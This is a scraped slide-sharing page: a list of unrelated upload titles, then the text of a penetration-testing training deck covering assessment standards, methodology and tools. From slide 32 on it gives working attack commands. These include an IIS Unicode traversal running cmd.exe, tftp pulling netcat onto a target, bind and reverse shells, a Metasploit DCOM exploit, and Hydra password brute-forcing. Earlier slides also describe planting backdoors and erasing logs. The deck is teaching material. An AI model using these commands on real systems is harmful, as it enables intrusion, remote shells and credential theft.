BÀI TẬP BỔ TRỢ 4 KĨ NĂNG TIẾNG ANH LỚP 8 - CẢ NĂM - GLOBAL SUCCESS - NĂM HỌC ...BÀI TẬP BỔ TRỢ 4 KĨ NĂNG TIẾNG ANH LỚP 8 - CẢ NĂM - GLOBAL SUCCESS - NĂM HỌC ...
BÀI TẬP BỔ TRỢ 4 KĨ NĂNG TIẾNG ANH LỚP 8 - CẢ NĂM - GLOBAL SUCCESS - NĂM HỌC ...Nguyen Thanh Tu Collection
 
Employablity presentation and Future Career Plan.pptx
Employablity presentation and Future Career Plan.pptxEmployablity presentation and Future Career Plan.pptx
Employablity presentation and Future Career Plan.pptxryandux83rd
 
DiskStorage_BasicFileStructuresandHashing.pdf
DiskStorage_BasicFileStructuresandHashing.pdfDiskStorage_BasicFileStructuresandHashing.pdf
DiskStorage_BasicFileStructuresandHashing.pdfChristalin Nelson
 
The Emergence of Legislative Behavior in the Colombian Congress
The Emergence of Legislative Behavior in the Colombian CongressThe Emergence of Legislative Behavior in the Colombian Congress
The Emergence of Legislative Behavior in the Colombian CongressMaria Paula Aroca
 
6 ways Samsung’s Interactive Display powered by Android changes the classroom
6 ways Samsung’s Interactive Display powered by Android changes the classroom6 ways Samsung’s Interactive Display powered by Android changes the classroom
6 ways Samsung’s Interactive Display powered by Android changes the classroomSamsung Business USA
 
4.9.24 Social Capital and Social Exclusion.pptx
4.9.24 Social Capital and Social Exclusion.pptx4.9.24 Social Capital and Social Exclusion.pptx
4.9.24 Social Capital and Social Exclusion.pptxmary850239
 
Tree View Decoration Attribute in the Odoo 17
Tree View Decoration Attribute in the Odoo 17Tree View Decoration Attribute in the Odoo 17
Tree View Decoration Attribute in the Odoo 17Celine George
 
18. Training and prunning of horicultural crops.pptx
18. Training and prunning of horicultural crops.pptx18. Training and prunning of horicultural crops.pptx
18. Training and prunning of horicultural crops.pptxUmeshTimilsina1
 
How to Manage Buy 3 Get 1 Free in Odoo 17
How to Manage Buy 3 Get 1 Free in Odoo 17How to Manage Buy 3 Get 1 Free in Odoo 17
How to Manage Buy 3 Get 1 Free in Odoo 17Celine George
 
4.11.24 Poverty and Inequality in America.pptx
4.11.24 Poverty and Inequality in America.pptx4.11.24 Poverty and Inequality in America.pptx
4.11.24 Poverty and Inequality in America.pptxmary850239
 
DBMSArchitecture_QueryProcessingandOptimization.pdf
DBMSArchitecture_QueryProcessingandOptimization.pdfDBMSArchitecture_QueryProcessingandOptimization.pdf
DBMSArchitecture_QueryProcessingandOptimization.pdfChristalin Nelson
 
CLASSIFICATION OF ANTI - CANCER DRUGS.pptx
CLASSIFICATION OF ANTI - CANCER DRUGS.pptxCLASSIFICATION OF ANTI - CANCER DRUGS.pptx
CLASSIFICATION OF ANTI - CANCER DRUGS.pptxAnupam32727
 
Congestive Cardiac Failure..presentation
Congestive Cardiac Failure..presentationCongestive Cardiac Failure..presentation
Congestive Cardiac Failure..presentationdeepaannamalai16
 
How to Uninstall a Module in Odoo 17 Using Command Line
How to Uninstall a Module in Odoo 17 Using Command LineHow to Uninstall a Module in Odoo 17 Using Command Line
How to Uninstall a Module in Odoo 17 Using Command LineCeline George
 

Recently uploaded (20)

31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...
31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...
31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...
 
MS4 level being good citizen -imperative- (1) (1).pdf
MS4 level   being good citizen -imperative- (1) (1).pdfMS4 level   being good citizen -imperative- (1) (1).pdf
MS4 level being good citizen -imperative- (1) (1).pdf
 
BÀI TẬP BỔ TRỢ 4 KĨ NĂNG TIẾNG ANH LỚP 8 - CẢ NĂM - GLOBAL SUCCESS - NĂM HỌC ...
BÀI TẬP BỔ TRỢ 4 KĨ NĂNG TIẾNG ANH LỚP 8 - CẢ NĂM - GLOBAL SUCCESS - NĂM HỌC ...BÀI TẬP BỔ TRỢ 4 KĨ NĂNG TIẾNG ANH LỚP 8 - CẢ NĂM - GLOBAL SUCCESS - NĂM HỌC ...
BÀI TẬP BỔ TRỢ 4 KĨ NĂNG TIẾNG ANH LỚP 8 - CẢ NĂM - GLOBAL SUCCESS - NĂM HỌC ...
 
Employablity presentation and Future Career Plan.pptx
Employablity presentation and Future Career Plan.pptxEmployablity presentation and Future Career Plan.pptx
Employablity presentation and Future Career Plan.pptx
 
DiskStorage_BasicFileStructuresandHashing.pdf
DiskStorage_BasicFileStructuresandHashing.pdfDiskStorage_BasicFileStructuresandHashing.pdf
DiskStorage_BasicFileStructuresandHashing.pdf
 
The Emergence of Legislative Behavior in the Colombian Congress
The Emergence of Legislative Behavior in the Colombian CongressThe Emergence of Legislative Behavior in the Colombian Congress
The Emergence of Legislative Behavior in the Colombian Congress
 
6 ways Samsung’s Interactive Display powered by Android changes the classroom
6 ways Samsung’s Interactive Display powered by Android changes the classroom6 ways Samsung’s Interactive Display powered by Android changes the classroom
6 ways Samsung’s Interactive Display powered by Android changes the classroom
 
4.9.24 Social Capital and Social Exclusion.pptx
4.9.24 Social Capital and Social Exclusion.pptx4.9.24 Social Capital and Social Exclusion.pptx
4.9.24 Social Capital and Social Exclusion.pptx
 
Tree View Decoration Attribute in the Odoo 17
Tree View Decoration Attribute in the Odoo 17Tree View Decoration Attribute in the Odoo 17
Tree View Decoration Attribute in the Odoo 17
 
Spearman's correlation,Formula,Advantages,
Spearman's correlation,Formula,Advantages,Spearman's correlation,Formula,Advantages,
Spearman's correlation,Formula,Advantages,
 
18. Training and prunning of horicultural crops.pptx
18. Training and prunning of horicultural crops.pptx18. Training and prunning of horicultural crops.pptx
18. Training and prunning of horicultural crops.pptx
 
How to Manage Buy 3 Get 1 Free in Odoo 17
How to Manage Buy 3 Get 1 Free in Odoo 17How to Manage Buy 3 Get 1 Free in Odoo 17
How to Manage Buy 3 Get 1 Free in Odoo 17
 
CARNAVAL COM MAGIA E EUFORIA _
CARNAVAL COM MAGIA E EUFORIA            _CARNAVAL COM MAGIA E EUFORIA            _
CARNAVAL COM MAGIA E EUFORIA _
 
Chi-Square Test Non Parametric Test Categorical Variable
Chi-Square Test Non Parametric Test Categorical VariableChi-Square Test Non Parametric Test Categorical Variable
Chi-Square Test Non Parametric Test Categorical Variable
 
Plagiarism,forms,understand about plagiarism,avoid plagiarism,key significanc...
Plagiarism,forms,understand about plagiarism,avoid plagiarism,key significanc...Plagiarism,forms,understand about plagiarism,avoid plagiarism,key significanc...
Plagiarism,forms,understand about plagiarism,avoid plagiarism,key significanc...
 
4.11.24 Poverty and Inequality in America.pptx
4.11.24 Poverty and Inequality in America.pptx4.11.24 Poverty and Inequality in America.pptx
4.11.24 Poverty and Inequality in America.pptx
 
DBMSArchitecture_QueryProcessingandOptimization.pdf
DBMSArchitecture_QueryProcessingandOptimization.pdfDBMSArchitecture_QueryProcessingandOptimization.pdf
DBMSArchitecture_QueryProcessingandOptimization.pdf
 
CLASSIFICATION OF ANTI - CANCER DRUGS.pptx
CLASSIFICATION OF ANTI - CANCER DRUGS.pptxCLASSIFICATION OF ANTI - CANCER DRUGS.pptx
CLASSIFICATION OF ANTI - CANCER DRUGS.pptx
 
Congestive Cardiac Failure..presentation
Congestive Cardiac Failure..presentationCongestive Cardiac Failure..presentation
Congestive Cardiac Failure..presentation
 
How to Uninstall a Module in Odoo 17 Using Command Line
How to Uninstall a Module in Odoo 17 Using Command LineHow to Uninstall a Module in Odoo 17 Using Command Line
How to Uninstall a Module in Odoo 17 Using Command Line
 

NSA and PT

  • 1. Program: Certified Computer Security Analyst (CCSA) LSP Telematika Created By Semi Yulianto Shared By Linuxer@kaskus.co.id
  • 2. Semi Yulianto MCT, MCP, MCSA, MCSE, MCSA & MCSE: Security, MCTS, MCITP, CCNA, CCNP, CNI, CNA, CNE, CCA, CIW-CI, CIW-SA, CEI, CEH, ECSA, CHFI, EDRP, ECSP, etc  Independent Trainer and Consultant  EC-Council Indonesia & Asia Pacific (Jakarta, Indonesia) Current Roles: ITS2 (Riyadh, Saudi Arabia) Senior Technical Trainer/Security Consultant IshanTech (M) Sdn Bhd (Kuala Lumpur, Malaysia)  Security Consultant (Web Application Pen-Tester)  Security Consultant (ESET Anti-Virus & Smart Security) semi.yulianto@flexi-learn.com and semi.yulianto2009@gmail.com Contacts: +62 852 1325 6600 and +60 14 9377 462
  • 3. 1. Vulnerabilities by Management Categories 2. Assessment Standards 3. Assessment Service Definition 4. Network Assessment Methodology 5. Pen-Test Methodology 6. Security Tools 7. Investigating Vulnerabilities
  • 4. OS configuration - Vulnerabilities due to improperly configured operating system software.  Software maintenance - Vulnerabilities due to failure to apply patches to known vulnerabilities.  Password/access control - Failure to comply with password policy and improper access control settings.  Malicious software - Existence of malicious software (Trojans, worms, etc.) or evidence of use.  Dangerous services - Existence of vulnerable or easily exploited services or processes.  Application configuration - Vulnerabilities due to improperly configured applications. 
  • 5.
  • 6.
  • 7. The United States National Security Agency (NSA) has provided an NSA (US) INFOSEC Assessment Methodology (IAM) framework to help consultants  and security professionals outside the NSA provide assessment services to clients in line with a recognized standard. http://www.iatrp.com The Government Communications Headquarters (GCHQ) in the United CESG CHECK (UK) Kingdom has an information assurance arm known as the Communications   and Electronics security consultants outside the NSA to provide assessment services, CESG operates a program known as CHECK to evaluate and accredit security Security Group (CESG). In the same way that the NSA IAM framework allows testing teams within the U.K. to undertake government assessment work. http://www.cesg.gov.uk/site/check/index.cfm
  • 8.  Assessment - Level 1 involves discovering a cooperative high- The IAM framework defines three levels of assessment: level overview of the organization being assessed, including access to policies, procedures, and information flow. No hands- on network or system testing is undertaken at this level. Evaluation - Level 2 is a hands-on cooperative process that involves testing with network scanning, penetration tools, and the use of specific technical expertise.  Red Team - Level 3 is non cooperative and external to the target network, involving penetration testing to simulate the appropriate adversary. IAM assessment is on intrusive, so within  this framework, a Level 3 assessment involves full qualification of vulnerabilities.
  • 9. 1. Use of DNS information retrieval tools for both single and The CESG CHECK network security assessment as: multiple records, including an understanding of DNS record structure relating to target hosts. 2. Use of ICMP, TCP, and UDP network mapping and probing tools 3. Demonstration of TCP service banner grabbing. 4. Information retrieval using SNMP, including an understanding of MIB structure relating to target system configuration and network routes. 5. Understanding of common weaknesses in routers and switches relating to Telnet, HTTP, SNMP, and TFTP access and configuration.
  • 10. 1. User enumeration via finger, rusers, rwho, and SMTP CESG CHECK Unix-specific competencies: techniques 2. Use of tools to enumerate Remote Procedure Call (RPC) services and demonstrate an understanding of the security implications associated with those services. 3. Demonstration of testing for Network File System (NFS) weaknesses. 4. Testing for weaknesses within r-services (rsh, rexec, and rlogin). 5. Detection of insecure X Windows servers. 6. Testing for weaknesses within web, FTP, and Samba services.
  • 11. 1. Assessment of NetBIOS and CIFS services to enumerate CESG CHECK Windows NT-specific competencies: users, groups, shares, domains, domain controllers, password policies, and associated weaknesses. 2. Username and password grinding via NetBIOS and CIFS services. 3. Detecting and demonstrating presence of known security weaknesses within. 4. Internet Information Server (IIS) web and FTP service components, and Microsoft SQL Server.
  • 12.  ISECOM’s Open Source Security Testing Methodology Other Assessment Standards & Associations: Manual (OSSTMM) http://www.osstmm.org  Council of Registered Ethical Security Testers (CREST) http://www.crestapproved.com  TIGER Scheme http://www.tigerscheme.org  EC-Council’s Certified Ethical Hacker (CEH) http://www.eccouncil.org/CEH.htm  Open Source Web Application Security Project (OWASP) http://www.owasp.org
  • 13. 1. Vulnerability Scanning 2. Network Security Assessment 3. Web Application Testing 4. Penetration Testing 5. Onsite Audit
  • 14. Uses automated systems (such as Nessus, ISS Internet Vulnerability Scanning Scanner, QualysGuard, or eEye Retina) with minimal  hands-on qualification and assessment of vulnerabilities. This is an inexpensive way to ensure that no obvious vulnerabilities exist, but it doesn’t provide a clear strategy to improve security. An effective blend of automated and hands-on manual Network Security Assessment vulnerability testing and qualification. The report is  usually handwritten, accurate, and concise, giving practical advice that can improve a company’s security.
  • 15. Involves post-authentication assessment of web application Web Application Testing components, identifying command injection, poor  permissions, and other weaknesses within a given web application. Testing at this level involves extensive manual qualification and consultant involvement, and it cannot be easily automated. Involves multiple attack vectors (e.g., telephone war dialing, Penetration Testing social engineering, and wireless testing) to compromise the  target environment. It demonstrates and discusses the methodologies adopted by determined Internet-based attackers to compromise IP networks remotely, which in turn will allow you to improve IP network security.
  • 16. Provides the clearest picture of network security.  Onsite Audition Consultants have local system access and run tools on each system capable of identifying anything untoward, including rootkits, weak user passwords, poor permissions, and other issues. 802.11 wireless testing is often performed as part of onsite auditing.
  • 17.
  • 18.
  • 19. 1. Network reconnaissance to identify IP networks High-level components of Network Assessment: and hosts of interest. 2. Bulk network scanning and probing to identify potentially vulnerable hosts. 3. Investigation of vulnerabilities and further network probing by hand. 4. Exploitation of vulnerabilities and circumvention of security mechanisms.
  • 20. 1. Information Gathering 2. Service Enumeration 3. Vulnerability Identification 4. Penetration 5. Maintaining Access 6. Housekeeping
  • 21. The objective of information gathering is to find as  Information Gathering many information as possible about the target of evaluation by using passive (Google, Whois, WWW) or active (social engineering) information gathering. Involves launching network and port scanning to  Service Enumeration find open, filtered ports and services running on a specific port.
  • 22. Involves finding new and currently available  Vulnerability Identification vulnerability on the operating systems, applications and/or services (manual or automated). Involves active penetration on a specific target of  Penetration evaluation by exploiting any new or known vulnerability.
  • 23. Involves uploading trojan or backdoor with the Maintaining Access objective to make it easier to go in and out from a  target of evaluation without having to do the exploitation and ensure that the activities are not being noticed. Clearning up to cover tracks. Involves disabling Housekeeping audit settings and clearing or altering log files  (system, security and application).
  • 24.
  • 25. 1. Nmap (http://www.insecure.org) Scanning Tools: 2. Nessus (http://www.nessus.org) 3. ISS Internet Scanner (http://www.iss.net) 4. eEye Retina (http://www.eeye.com) 5. QualysGuard (http://www.qualys.com) 6. Matta Colossus (http://www.trustmatta.com)
  • 26. 1. Metasploit Framework Exploitation Frameworks: (http://www.metasploit.com) 2. Core IMPACT (http://www.coresecurity.com) 3. Immunity CANVAS (http://www.immunityinc.com/products- canvas.shtml)
  • 27. 1. Paros (http://www.parosproxy.org) Proxy-based web application testing tools: 2. WebScarab http://www.owasp.org/index.php/Category:OWAS P_WebScarab_Project) 3. Burp suite (http://portswigger.net)
  • 28. 1. Wapiti (http://wapiti.sourceforge.net) Active web application crawling and fuzzing tools: 2. Nikto (http://www.cirt.net/code/nikto.shtml)
  • 29. 1. Acunetix Web Vulnerability Scanner Web Application Scanning Tools: (http://www.acunetix.com) 2. Watchfire AppScan (http://www.watchfire.com/products/appscan/) 3. SPI Dynamics WebInspect (http://www.spidynamics.com/products/webinspe ct/) 4. Cenzic Hailstorm (http://www.cenzic.com/products_services/cenzic _hailstorm.php)
  • 30. 1. Securiteam (http://www.securiteam.com) Useful Websites: 2. SecurityFocus (http://www.securityfocus.com) 3. milw0rm (http://www.milw0rm.com) 4. Offensive Security Exploit DB (http://www.exploit-db.com) 5. Packet Storm (http://www.packetstormsecurity.org) 6. FrSIRT (http://www.frsirt.com) 7. MITRE Corporation CVE (http://cve.mitre.org) 8. NIST National Vulnerability Database (http://nvd.nist.gov) 9. ISS X-Force (http://xforce.iss.net) 10. CERT vulnerability notes (http://www.kb.cert.org/vuls) 11. eEye Preview (http://research.eeye.com/html/services) 12. 3Com TippingPoint DVLabs (http://dvlabs.tippingpoint.com) 13. VeriSign iDefense Security Intelligence Services (http://labs.idefense.com/services)
  • 31. 1. Information Gathering 2. Service Identification 3. Vulnerability Identification 4. Penetration (Exploitation) 5. Maintaining Access 6. Housekeeping (Covering Tracks) 7. Password Cracking 8. Client-Side Hacking 9. Web Application Hacking 10. Denial-of-Service (DoS) Attacks 11. Sniffing and ARP Spoofing 12. Wireless Hacking 13. Linux Hacking 14. Analyzing Attack Signatures with IDS and Sniffer 15. Evading IDS and Firewall
  • 32. IIS Unicode Directory Traversal Exploit  Syntax: nc –v <target_ip> <http_port> GET http://<target_ip>/scripts/<unicode_string s>/<windows_dir>/cmd.exe?/c+<command>  Example: nc –v 131.107.1.101 80 GET http://131.107.1.101/scripts/..%255c../win nt/system32/cmd.exe?/c+dir
  • 33. TFTP (Trivial File Transfer Protocol) Upload and Download  Syntax: tftp –i <localhost_ip> GET <file> tftp –i <localhost_ip> PUT <file>  Example: tftp –i 131.107.1.252 GET nc.exe tftp –i 131.107.1.101 PUT nc.exe  Unicode Examples: GET http://131.107.1.101/scripts/..%255c../winnt/syste m32/cmd.exe?/c+tftp+-i+131.107.1.252+GET+nc.exe
  • 34. Netcat (Network Swiss Army Knife) Server Mode (listening/reverse TCP)  Syntax: nc –v –l –p <port_to_listen_to> nc –vlp <port_to_listen_to>  Example: nc –v –l –p 555 nc –vlp 555
  • 35. Netcat (Network Swiss Army Knife) Client Mode (connecting/bind TCP)  Syntax: nc –v <target_ip> <target_port>  Example: nc –v 131.107.1.101 555
  • 36. Netcat (Network Swiss Army Knife) Server Mode (listening/reverse TCP)  Syntax: nc –v –l –p <listening_port>  Unicode Syntax: GET http://<target_ip>/scripts/<unicode_strings>/<wind ows_dir>/cmd.exe?/c+<command>  Example: GET http://131.107.1.101/scripts/..%255c../winnt/syste m32/cmd.exe?/c+nc+-v+-l+-p+5555
  • 37. Netcat (Network Swiss Army Knife) Client Mode (connecting/bind TCP)  Syntax: nc –v <target_ip> <target_port>  Unicode Syntax: GET http://<target_ip>/scripts/<unicode_strings>/<wind ows_dir>/cmd.exe?/c+<command>  Example: GET http://131.107.1.101/scripts/..%255c../winnt/syste m32/cmd.exe?/c+nc+-v+131.107.1.252+555
  • 38. Nmap (Ping Sweep/Network Scan)  Syntax: nmap –sP <network_id>  Example: nmap –sP 131.107.1.0/24 Nmap (Port Scan)  Syntax: nmap <target_ip>  Example: nmap 131.107.1.101
  • 39. Nmap (Port Scan with Options)  Syntax: nmap <option> <target_ip>  Examples: nmap –sS –sV –O 131.107.1.101 nmap –sS –sV –p80,443 –O 131.107.1.101 nmap –sS –sV –p80,443 –O –T4 131.107.1.101 nmap –sS –sV –p80,443 –O –T4 –PN 131.107.1.101 nmap –sU –sV –O 131.107.1.101 nmap –A 131.107.1.101
  • 40. Nmap (Enumeration)  Syntax: nmap <option> <script> <target_ip>  Examples: nmap –sS –script=smb-enum-users 131.107.1.101 nmap –sS –script=smb-enum-shares 131.107.1.101 nmap –sS –script=smb-enum-domains 131.107.1.101 nmap –sS –script=smb-enum-processes 131.107.1.101 nmap –sS –script=smb-enum-security 131.107.1.101
  • 41. Metasploit Framework Exploit Module (MSFConsole) cd /pentest/exploits/msf3 ./msfconsole  Syntax: msf > help msf > show exploits msf > use <exploit_module> msf > show payloads msf > set PAYLOAD <payload_type> msf > show options msf > set RHOST <target_ip> msf > set LHOST <localhost_ip> msf > set LPORT <local_port> msf > set RPORT <remote_port> msf > show targets msf > set TARGET <target_id> msf > exploit
  • 42. Metasploit Framework Exploit Module (MSFConsole) cd /pentest/exploits/msf3 ./msfconsole  Example: msf > help msf > show exploits msf > use windows/dcerpc/ms03_026_dcom msf > show payloads msf > set PAYLOAD windows/shell/reverse_tcp msf > show options msf > set RHOST 131.107.1.101 msf > set LHOST 131.107.1.252 msf > set LPORT 5555 msf > set RPORT 1234 msf > show targets msf > set TARGET 0 msf > exploit
  • 43. Metasploit Framework Auxiliary Module cd /pentest/exploits/msf3 ./msfconsole  Syntax: msf > help msf > show auxiliary msf > use <auxiliary_module> msf > set RHOSTS <target_ip_or_network_id> msf > run
  • 44. Metasploit Framework Auxiliary Module cd /pentest/exploits/msf3 ./msfconsole  Example 1: msf > help msf > show auxiliary msf > use scanner/smb/smb_version msf > set RHOSTS 131.107.1.101 msf > run  Example 2: msf > help msf > show auxiliary msf > use scanner/smb/smb_version msf > set RHOSTS 131.107.1.0/24 msf > run
  • 45. Metasploit Framework Exploit Module (MSFCLI) cd /pentest/exploits/msf3  Syntax: ./msfcli <exploit_module> <payload_type> <options> E  Example: ./msfcli windows/dcerpc/ms03_026_dcom PAYLOAD=windows/shell/bind_tcp RHOST=131.107.1.101 E
  • 46. THC Hydra (Dictionary-based Password Cracking) cd /tmp  Syntax: ./hydra –L <users_file> -P <passwords_file> <target_ip> <service_type>  Examples: ./hydra –L login.txt –P pass.txt 131.107.1.101 ftp ./hydra –L login.txt –P pass.txt 131.107.1.101 smb ./hydra –L login.txt –P pass.txt 131.107.1.101 mssql ./hydra –L login.txt –P pass.txt 131.107.1.101 rpc
  • 47. Nikto (Web Application Vulnerability Scanner) cd /pentest/nikto  Syntax: ./nikto.pl –host <target_ip>  Example: ./nikto.pl –host 131.107.1.101